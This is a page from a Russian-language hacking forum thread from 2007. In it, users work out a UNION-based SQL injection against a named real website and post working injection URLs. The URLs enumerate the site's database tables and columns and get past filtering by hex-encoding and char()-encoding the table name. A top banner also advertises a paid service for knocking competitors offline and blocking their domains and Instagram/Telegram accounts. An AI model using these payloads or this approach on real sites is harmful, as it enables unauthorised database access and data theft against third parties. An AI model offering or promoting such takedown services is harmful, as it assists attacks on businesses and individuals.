УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL-inj

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

20.08.2007, 14:34

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

Цитата:

Сообщение от ENFIX

Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS

опечатался =)

#12

20.08.2007, 14:50

Qwertison

Познающий

Регистрация: 01.04.2007

Сообщений: 43

Провел на форуме:
297955

Репутация: -5

Уже надеялся что все.. Смотрю название таблы - http://mir-tech.ru/group.php?cat=-1+union+select+TABLE_NAME+fron+INFORMATION_SCHEMA. TABLES limit 0,1/*
Называется CHARACTER_SETS.
Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???

#13

20.08.2007, 21:09

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???

http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=0x4348415241435445525f53 455453 limit 0,1/*

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#14

20.08.2007, 21:54

delay(0)

Участник форума

Регистрация: 22.11.2006

Сообщений: 117

Провел на форуме:
1813343

Репутация: 141

Можно и так,

Цитата:

http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=char(67,72,65,82,65,67,8 4,69,82,95,83,69,84,83)+limit+2,1/*

#15

20.08.2007, 22:48

Taylorith

Участник форума

Регистрация: 06.09.2006

Сообщений: 177

Провел на форуме:
284125

Репутация: 16

Qwertison
у тя с головой все ок???
я втеме ваши уячзвимости написал тчо икак .... меня бесят такие люди.. тока флудить могут какого зхрена ты создаешь тему клоН?????? ваще чтоли даун... больше слов нет

#16

21.08.2007, 00:44

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

для подбора таблиц и много для чего -
SQl Injection tool, советую

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход